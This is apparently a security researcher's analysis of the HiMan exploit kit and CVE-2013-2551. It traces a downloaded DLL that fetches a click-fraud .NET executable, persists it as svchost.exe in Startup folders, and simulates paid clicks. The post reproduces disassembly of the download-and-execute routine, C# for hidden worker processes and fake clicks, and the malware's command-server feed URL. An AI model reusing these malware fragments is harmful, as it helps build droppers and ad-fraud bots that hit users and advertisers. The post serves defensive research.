HiMan EK and CVE-2013-2551

Recently during one of my analysis of URLs from urlquery, I came up with a URL ending in: /ie8910.html.

The link, after being opened, returns an index with the following code:

 

farert_2
As it can be seen from the “ip-blocked-by-firefox” Google Safe Browsing is already blocking the address, though there is no active service on port 8080 while there’s one running on port 80. At the time of writing, JARs files seem to be not reachable on the server.

I’ve run a quick analysis of ie8910.html on virustotal that reports the usage of CVE-2013-2551 and HiMan EK on the main page. We can confirm the it’s HiMan EK from this Malware don’t need Coffee post.

If the page’s name is of any indication, this exploit should work on IE 8-9-10, so I setup my virtual machine environment with WinXP sp3 and IE8, and I ran WireShark to analyse the network traffic.

The exploit tries to download a file called “dd” (virustotal report).

The file downloaded is a dll, here’s a code snippet:

call    ping_server
add     esp, 8
push    offset ProcName ; "URLDownloadToFileA"
push    offset LibFileName ; "urlmon.dll"
call    ds:LoadLibraryA
push    eax             ; hModule
call    ds:GetProcAddress
push    ebx
mov     URLDownloadToFileA, eax
call    main_bad

Main_bad takes care of the main initialisation: it downloads a .NET exe called farert.exe, which is copied, depending on the Windows version, to:

  • “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startu\svchost.exe”
  • “C:\Documents and Settings\All users\Start Menu\Programs\Startup\svchost.exe”
  • “\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe”
  • “\Start Menu\Programs\Startup\svchost.exe”

and then executed with a call to “WinExec”.

This dll in turn downloads two other dlls: versionxp.dll and version7.dll from the server that are copied multiple times to several different folders:

The control that discriminated WinXp from Windows 7 is performed like this:

.text:1000189D
push    offset FileName ; "C:\\Program Files (x86)"
call    ds:GetFileAttributesA
cmp     eax, 0FFFFFFFFh
jz      loc_10001971

That’s how strings are restored:

.text:10001219                 mov     ecx, ds:dword_1000A08C ;"srev"
.text:1000121F                 mov     [eax], ecx
.text:10001221                 mov     edx, ds:dword_1000A090; ".noi"
.text:10001227                 mov     [eax+4], edx
.text:1000122A                 mov     ecx, ds:dword_1000A094; "lld"
.text:10001236                 mov     [eax+8], ecx

So in the stack we will find, obviously: “version.dll”

For the interesting part, let’s talk about the .NET exe: this malware starts by patching a few APIs and then move the mouse cursor in order to emulate clicks on premium links (so we can classify it as a fraudware for pay per click links), let’s see how it works:

First of all it gets the following URL from the server:

FeedURL = “http://***ip***:82/feed.dll?pub_id=326&ua={$userAgent}”;

that returns a JSON like this:

{"query":"futuristic architecture",
"tasks":[{"referer":"http://ph****h.com/",
"bid":"0.00016",
"clickurl":"http://***ip***:82/click?sid=c0fbd3551ecc707eeaef23a963c777680f494dc8&cid=0"}]}

The clickurl is on the malicious server, but it has an http redirect (301 code) to the real link. Using the data coming from the JSON just fetched it runs a new instance of itself, passing an argument like this:

minion=true constants=ref%3Dhttp%3A%2F%2Ffi***ng.info%2F%25%3B%3Bclickurl%3Dhttp%3A%2F%2F***ip***%3A82%2Fclick%3Fsid%3D7365074149f1d4c825b06d9932ae48923f19a874%26cid%3D0%25%3B%3B

(unescaped)
minion=true constants=ref=http://fi***ng.info/%;;clickurl=http://***ip***:82/click?sid=7365074149f1d4c825b06d9932ae48923f19a874&cid=0%;;

This is the code that starts a new process:

ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.FileName = location;
startInfo.Arguments = string.Format("minion=true constants={0}", constants);
startInfo.UseShellExecute = false;
startInfo.CreateNoWindow = true;
worker.workProc = Process.Start(startInfo);

When the new process starts, it emulates a click on a paying links: it opens the referrer url with WebBrowser class and it creates a new A tag element:

 this.parent.Form1.gui.NavigatingFromRef = true;
 HtmlElement newElement = this.parent.Form1.gui.webBrowser1.Document.CreateElement("a");
 newElement.SetAttribute("HREF", clickurl);
 newElement.SetAttribute("ID", "aa");
 newElement.InnerText = "Visit our Web site for more details.";
 this.parent.Form1.gui.webBrowser1.Document.Body.AppendChild(newElement);
 newElement.InvokeMember("Click");

As you can see it’s still active at the time of writing.

Attention: The .NET exe can also execute just-in-time code on demand, in fact if the keyword “script” is present into the JSON that’s fetched from the server, the code will be executed with: “Jitter.JIT(code)” method.

If you want to proceed with a more thorough analysis, you can download the zip with all related files and some pcap captures (password as usual is: infected).

Pn